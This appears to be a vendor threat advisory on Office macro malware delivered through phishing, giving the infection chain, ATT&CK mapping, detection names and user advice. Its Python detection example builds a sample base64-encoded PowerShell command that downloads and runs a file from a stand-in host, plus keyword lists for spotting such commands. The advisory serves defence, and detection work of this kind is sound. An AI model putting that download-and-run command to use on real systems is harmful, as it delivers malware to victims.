Summary
A macro is a set of commands that automates an application to perform a certain action. Threat actors have taken advantage of this and created macro malware. This form of malware is known for abusing VBA (Visual Basic for Applications) programming in Microsoft Office macros to spread other forms of malware. It is often delivered through phishing emails in which the attacker lures the recipient into opening the attached document. Once the document is opened, a security warning appears and the document instructs the recipient to “Enable Content”. After that, the macro runs and the recipient's system is infected.
Upon being enabled, the malicious macro typically executes a base64-encoded PowerShell command that downloads a file to %UserProfile% or %Temp%. The downloaded file is then run shortly afterwards.
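The chain described above (Office process spawning PowerShell with an encoded command that drops a file into a user-writable directory and runs it) is straightforward to hunt for in process-creation telemetry. The following is an added example, not code from the original page or its vendor; the events are constructed in the shape of a Sysmon Event ID 1 / EDR feed, and the encoded sample script and the `example.invalid` host are constructed placeholders.

```python
import base64
import re

# Constructed sample script mirroring the pattern the page describes (not from a real sample):
# download a file into %Temp% and run it. example.invalid is a reserved, non-resolving name.
SAMPLE_SCRIPT = ('(New-Object Net.WebClient).DownloadFile("http://example.invalid/inv.exe","$env:TEMP\\inv.exe");'
                 'Start-Process "$env:TEMP\\inv.exe"')
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (parent image, image, command line), as Sysmon Event ID 1 reports them.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -w hidden -nop -enc {SAMPLE_ENCODED}"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "start-bitstransfer")
DROP_LOCATIONS = ("$env:temp", "%temp%", "$env:userprofile", "%userprofile%")
RUN_MARKERS = ("start-process", "invoke-item", "invoke-expression")
# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match all of them (longest first).
_ENC_FLAG = re.compile(r"-(?:encodedcommand|encoded|encode|encod|enco|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script hidden behind -EncodedCommand, or '' if absent or undecodable."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def assess_event(event: dict) -> dict:
    """Score one process-creation event for the Office -> encoded PowerShell -> drop-and-run chain."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    decoded = decode_encoded_command(event["command_line"])
    script = decoded.lower()
    findings = []
    if parent in OFFICE_PARENTS and image in ("powershell.exe", "pwsh.exe"):
        findings.append("office_spawned_powershell")
    if decoded:
        findings.append("encoded_command")
    if any(k in script for k in DOWNLOAD_MARKERS):
        findings.append("download")
    if any(k in script for k in DROP_LOCATIONS):
        findings.append("drop_to_user_dir")
    if any(k in script for k in RUN_MARKERS):
        findings.append("execute_dropped_file")
    # Three or more indicators together matches the page's infection chain; one alone is routine admin noise.
    return {"findings": findings, "decoded": decoded, "suspicious": len(findings) >= 3}
```

Decoding the command line before matching matters: the download URL and the %Temp% path never appear in the raw command line, only in the decoded script.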
Infection Chain:
Behaviors:
- Delivers other malware payloads
- Uses macro
- Steals computer data, computer name, system locale, operating system (OS) version and running processes
Impact:
- Compromised system security, with backdoor capabilities that can execute malicious commands
Sample Spam (Invoice Attachment)
Sample Document - "Enable Content"
- MS Word
- MS Excel
Sample Macro
- MS Word
- MS Excel
MITRE ATT&CK Matrix
| Behavior | Tactic | Technique |
|---|---|---|
| Malware arrives as an attachment | Initial Access | T1566.001 Phishing: Spearphishing Attachment |
| Victim is lured into opening the attachment | Execution | T1204.002 User Execution: Malicious File |
| Downloaded document has obfuscated macros to hide URLs hosting the malware | Defense Evasion | T1027 Obfuscated Files or Information |
| Macro-enabled document downloads and executes the payload using a PowerShell command | Execution | T1059.005 Command and Scripting Interpreter: Visual Basic; T1059.001 Command and Scripting Interpreter: PowerShell |
Available Solutions:
| Solution Modules | Solution Available | Pattern Branch | Release Date | Detection/Policy/Rules |
|---|---|---|---|---|
| Email Protection | Yes | AS Pattern 5630 | August 28, 2020 | - |
| URL Protection | Yes | In the Cloud | - | - |
| Advanced Threat Scan Engine (ATSE) | Yes | 16.191.00 | August 28, 2020 | - |
| Predictive Learning (TrendX) | Yes | In the Cloud | - | Downloader.VBA.TRX.XXVBAF01FF009 |
| File detection (VSAPI) | Yes | ENT OPR 16.191.00 | August 28, 2020 | Trojan.W97M.EMOTET.TIOIBEKL, Trojan.W97M.EMOTET.TIOIBEKN, Trojan.W97M.ICEDID.AL, Trojan.W97M.POWLOAD.EMI, Trojan.W97M.POWLOAD.EMJ, Trojan.W97M.POWLOAD.TIOIBEMH, Trojan.W97M.POWLOAD.TIOIBEMN, Trojan.W97M.TRICKBOT.OD, Trojan.X97M.POWLOAD.USMANFOGEK, Trojan.X97M.POWLOAD.USNA |
| Behavioral Monitoring (AEGIS) | Yes | TMTD OPR 2163 | August 27, 2020 | 4560T |
Additional Threat Information Reference:
Recommendations:
- Always enable and use the macro security function in Microsoft Word and Excel.
- Be extremely cautious about enabling macros. If there is any doubt about the authenticity of an email urging you to download a Word or Excel document, forward the contents to a member of the IT staff.
- If you continuously receive email attachments with macros from spam campaigns, you may utilize IMSVA’s macro scanning.